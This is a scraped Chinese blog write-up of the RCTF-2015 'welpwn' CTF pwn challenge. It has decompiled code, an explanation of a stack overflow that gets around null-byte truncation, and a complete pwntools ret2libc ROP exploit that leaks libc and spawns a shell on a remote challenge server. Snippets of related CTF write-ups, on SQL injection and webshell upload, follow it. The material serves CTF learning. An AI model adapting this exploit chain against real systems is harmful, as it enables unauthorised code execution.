RCTF-2015——welpwn

最新推荐文章于 2022-07-05 19:33:12 发布
最新推荐文章于 2022-07-05 19:33:12 发布
阅读量337 收藏
点赞数
原文链接:http://www.cnblogs.com/pfcode/p/10848955.html
版权

64位程序

程序逻辑

 1 int __cdecl main(int argc, const char **argv, const char **envp)
 2 {
 3   char buf; // [rsp+0h] [rbp-400h]
 4 
 5   write(1, "Welcome to RCTF\n", 0x10uLL);
 6   fflush(_bss_start);
 7   read(0, &buf, 0x400uLL);
 8   echo((__int64)&buf);
 9   return 0;
10 }
11 
12 int __fastcall echo(__int64 a1)
13 {
14   char s2[16]; // [rsp+10h] [rbp-10h]
15 
16   for ( i = 0; *(_BYTE *)(i + a1); ++i )
17     s2[i] = *(_BYTE *)(i + a1);
18   s2[i] = 0;
19   if ( !strcmp("ROIS", s2) )
20   {
21     printf("RCTF{Welcome}", s2);
22     puts(" is not flag");
23   }
24   return printf("%s", s2);
25 }

read最多0x400字节,echo会将这些字节拷贝到s2数组中,超过0x18字节即会覆盖返回地址。

利用思路


由于echo拷贝时,会被\x00截断,所以不能连续覆盖多个地址来rop,

在echo函数ret处下断点,调试可以发现echo返回地址下方即为read时的buf处

所以可以覆盖返回地址为pop pop pop pop ret指令地址,返回时弹出0x18个填充字节和返回地址,返回到buf+0x20处

在buf+0x20处构造rop,先泄露libc基地址,返回到start

重新执行,输入使之执行system('/bin/sh')

下次遇到栈溢出题目一定要多调试,注意栈的结构。

exploit

 

 1 from pwn import *
 2 #sh=process('./welpwn')
 3 sh=remote('111.198.29.45',47606)
 4 elf=ELF('./welpwn')
 5 #libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
 6 libc=ELF('./libc64-2.19.so')
 7 poprdi_ret=0x4008a3
 8 pop4_ret=0x40089c
 9 puts_plt=elf.plt['puts']
10 write_got=elf.got['write']
11 start=0x400630
12 sh.recvuntil('Welcome to RCTF\n')
13 payload='a'*0x10+'b'*8+p64(pop4_ret)
14 payload+=p64(poprdi_ret)+p64(write_got)+p64(puts_plt)+p64(start)
15 sh.send(payload)
16 sh.recvuntil('a'*0x10+'b'*8)
17 sh.recv(3)
18 write_adr=u64(sh.recv(6).ljust(8,'\x00'))
19 print 'write_adr: '+hex(write_adr)
20 #libc_base=write_adr-libc.symbols['write']
21 libc_base=write_adr-0x0f72b0
22 print 'libc_base: '+hex(libc_base)
23 system_adr=libc_base+0x045390
24 binsh_adr=libc_base+0x18cd57
25 '''
26 system_adr=libc_base+libc.symbols['system']
27 binsh_adr=libc_base+libc.search('/bin/sh\x00').next()
28 sh.recvuntil('Welcome to RCTF\n')
29 '''
30 payload='a'*0x10+'b'*8+p64(pop4_ret)
31 payload+=p64(poprdi_ret)+p64(binsh_adr)+p64(system_adr)
32 sh.send(payload)
33 sh.interactive()

 

转载于:https://www.cnblogs.com/pfcode/p/10848955.html

aaa15893831716
关注
攻防世界-PWN进阶区-welpwn(RCTF-2015)
weixin_44145820的博客
02-27 1100
题目分析 首先看一下开了哪些保护 因为开了NX,所以考虑使用ROP或者return-into-libc 用IDApro分析一下源代码 可以看出main函数中不存在注入点,我们看一下echo函数 在eho函数中,缓冲区至分配了0x10大小,但是传入的buf有0x400字节,因此可以看出存在溢出 不过拷贝遇到\x00就停止了,这个时候我们只能注入一个返回地址。 但是在ROPgadget里面能找到...
RCTF2015 welpwn: 200 writeup
fuchuangbob的专栏
06-14 2405
题目:http://oj.xctf.org.cn/files/welpwn_932a4428ea8d4581431502ab7e66ea4b最简单栈溢出,先read 1024字节,然后循环赋值导致栈溢出,循环到\0结束,因此需要构造ROP过掉\0限制: 0x0040089c: pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret ‘A’*24 + p64(0x
welpwnRCTF-2015)--write up
ATFWUS的博客
03-12 939
文件下载地址: 链接:https://pan.baidu.com/s/1MG2z9r4wz_WTEz1vIikqJQ 提取码:3tbc 0x01.分析 checksec: 源码分析: 流程非常简单,首先输入一个1024大小字符串,然后进入函数echo,这个函数会将buf的数据一个字节一个字节的复制到s2中,...
RCTF 2015 welpwn [ROP] [x64通用gadgets] [简单写法]
ACdream
01-26 388
https://blog.csdn.net/u011987514/article/details/70232881 按照自己习惯,代码重写一下: #!/usr/bin/env python # coding=utf-8 from pwn import * io = process("./welpwn") #gadgets p4r = 0x40089C pr = 0x4008A3 mai...
RCTF 2015 welpwn [ROP] [x64通用gadgets]
ACdream
01-26 803
先checksec一下: 漏洞点其实蛮好找的:程序里也没几个函数 main函数中read了一个字符串,然后当成参数传递给了echo函数 在echo中的函数的接收buffer长度仅仅为0x10,而且是一个一个字符赋值的,栈缓冲区溢出漏洞,0x10 + 0x8 = 0x18个填充 控制了ESP之后,程序开启了NX,一定想到的是ROP 这里的基础知识是: http:/...
XCTF攻防世界题目upload(RCTF-2015)
daqiangdetianxia的博客
08-12 745
upload 信息搜集 dirsearch目录扫描,发现classes目录 然后进入classes目录,发现password.php user.php文件夹 中间件和服务器:Apache/2.4.7 (Ubuntu) 尝试 用sqlmap对登录和注册页面进行注入,发现不行。 注册后进行登录,发现有一个文件上传页面。可能是一个文件上传漏洞。 上传一句话木马,找不到上传后的文件夹,于是通过猜测上传文件夹名称,找不到,于是放弃文件上传漏洞。 文件上传后发现 ...
XCTF 3rd-RCTF-2017——Recho分析
Eagle_hwei的博客
02-05 1139
Recho的题目分析 2020-02-04 21:10:35by hawkJW 题目附件、ida文件及wp链接   这道题的思路和以往的不太一样,在这里学习、记录一下   1.  程序流程总览 首先,还是老规矩,看一下保护情况   可以看到,保护情况还是比较轻松的,主要在NX上,即栈上不可执行。下面具体看一下程序的流程,如图所示 实际上,我们发现这个流程还是比较简单的,就...
Python库 | rctf-golf-1.0.0.tar.gz
03-10
本资源是一个名为“rctf-golf”的Python库,版本为1.0.0,封装在“rctf-golf-1.0.0.tar.gz”压缩包内。这个库可能是为了解决特定问题或提供某些功能而创建的,它通常包含一系列模块、脚本和文档,方便开发者在自己的...
[wp][RCTF2015]EasySQL
小飒的博客
07-05 484
有修改密码怀疑是2次注入 admin被注册 sqli-lab24关中遇到过二次注入 特地去看了下代码 一开始尝试admin’# 修改密码 admin还是登陆不上 使用admin"# 修改密码后,可以使用admin登陆上,但是没任何变化 试下报错注入 注册的时候发现有过滤 得到数据库名:web_sqli 得到表名article,flag,users 盲猜列名 flag 获得"~RCTF{Good job! But flag not her"疯了,只能试下别的表,希望不要是被我修改了的admin密码 real_
菜鸟做题记--------welpwnRCTF2015
Return的博客
02-12 622
1.看下保护发现只打开了NX。 [*] 'home/ctf/welpwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 2.拖入IDA看下结果 int __cdecl main(int argc, const char **argv, const char **e
rctf:redpwn的CTF平台
03-28
rCTF是redpwnCTF的CTF平台。 它由 CTF团队开发和维护。 入门 要开始使用rCTF,请访问文档在 如果您需要有关rCTF的帮助,请加入并在#rctf-help频道中提问。 使用rCTF部署挑战 rCTF本身不处理挑战性部署。 (可选)您可以使用部署挑战。 它与rCTF高度集成。 发展 我们将竭诚为您服务! 请参阅 。
welpwn RCTF-2015 攻防世界
qq_41071646的博客
06-03 1677
参考链接 http://www.purpleroc.com/md/2015-11-17@RCTF-Writeup.html 这个题只是没有想到 找到这个点 然后 攻防世界 给的 so库也有问题 感觉 攻防世界的so环境都是 2.23的鸭 然后我就没有用DynELF 其实 可以在服务器看一下 地址 然后根据 后三位来判断是那个 只不过没有 DynELF 方便 思路就是 构造一个 ...
实验吧之2015RCTF(misc)
weixin_30929295的博客
05-04 505
参考链接: https://blog.csdn.net/lamdasniper/article/details/78591650 写的真好!!! 转载于:https://www.cnblogs.com/BASE64/p/10809931.html
[XCTF-pwn] 10-welpwn-rctf-2015
weixin_52640415的博客
02-26 253
很久前的题,主程序里没有溢出,echo里遇0截断这里虽有溢出但也写不了rop,64们0太多了。 思路是,A*0x10+0这样会将rbp的尾部1字节置0,然后在payload尾部写rop,中间补ret int __cdecl main(int argc, const char **argv, const char **envp) { char buf[1024]; // [rsp+0h] [rbp-400h] BYREF write(1, "Welcome to RCTF\n", 0x10uL
welpwnctf题目
shanwei274的博客
04-06 284
记录一道自己做的ctf题目:welpwnRCTF-2015 1.老生常谈checksec查看: 可以看到只开了nx保护,下面我们进入ida下面看看。 发现是一个想rbp-400,rsp+0h的地方read进入恰好0x400的数据,然后调用了echo函数,我们进入echo看看。 发现了一个简化版的strcpy函数,第一反应溢出溢出!但是这里由于在复制过程中遇到’0x00‘会被截断,所以64位下我们打包的p64(pop_rdi)+p64(binsh_addr)+p64(system)可能复制不到一半就
[RCTF2015]EasySQL
yao_xin_de_yuan的博客
08-30 1250
打开靶机看到登陆和注册的链接。 访问注册页面register.php,注册一个admin'"\用户 密码和邮箱为123。 登陆成功到index.php,可以看到输入的信息被原封不动的插入到了数据库。 点击用户名跳转到user.php,看到可以修改密码。 点击change_password跳转到changepwd.php 修改密码123为1234后,发现sql语句报错。 You have an error in your SQL syntax; check the manual that corr
RCTF-2015 TankGame
qq_41071646的博客
05-06 1164
好久没有做过逆向题了 然后在攻防世界看到了这个题 感觉也很好玩 就下载玩了玩 游戏看起来有点简单 但是确实很恶心 emmmm 然后我找到了消息处理函数 我们这里跟进去看看这个函数是干啥的 看得出来这里 这里有一个filename 而且还异或加密了 我出于好奇 解密看了一下 竟然是flag.txt。。。 那么也就是说。。。。。。。 下面的就是flag。。。。 解密交上去来...
RCTF2015 pwn试题分析
weixin_30764137的博客
05-13 181
pwn200 漏洞给的很明显,先是读到了main的局部数组中,然后在子函数中向子函数的局部数组栈里复制。 总体思路是leak system的地址,然后再向一个固定地址写入/bin/sh,最后执行system函数 leak使用pwn库的DynELF实现,整体使用rop链。 1 //ida伪代码 2 int __fastcall echo(__int64 a1) 3 { 4 ...
rctf
zhang14916的博客
05-24 578
baby-crtpto: 阅读源码发现程序首先要求我们输入username和password,然后对cookie“admin:0;username:%s;password:%s"做aes-cbc加密,然后计算sha1(key+cookie),最后将AES-cbc的iv,密文和sha1的值连接在一起返回给我们。要求我们输入相同形式的字符串,并要求cookie中存在"admin"="1"且验证sha...
rctf-golf 1.0.0 - Python开发语言新库发布
资源摘要信息:"rctf-golf-1.0.0.tar.gz" 知识点: 1. Python库:Python库是指用Python语言编写的软件包,它可以让开发者在编写程序时,复用经过验证的代码模块。Python的标准库中包含了大量的模块,用于操作字符串、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值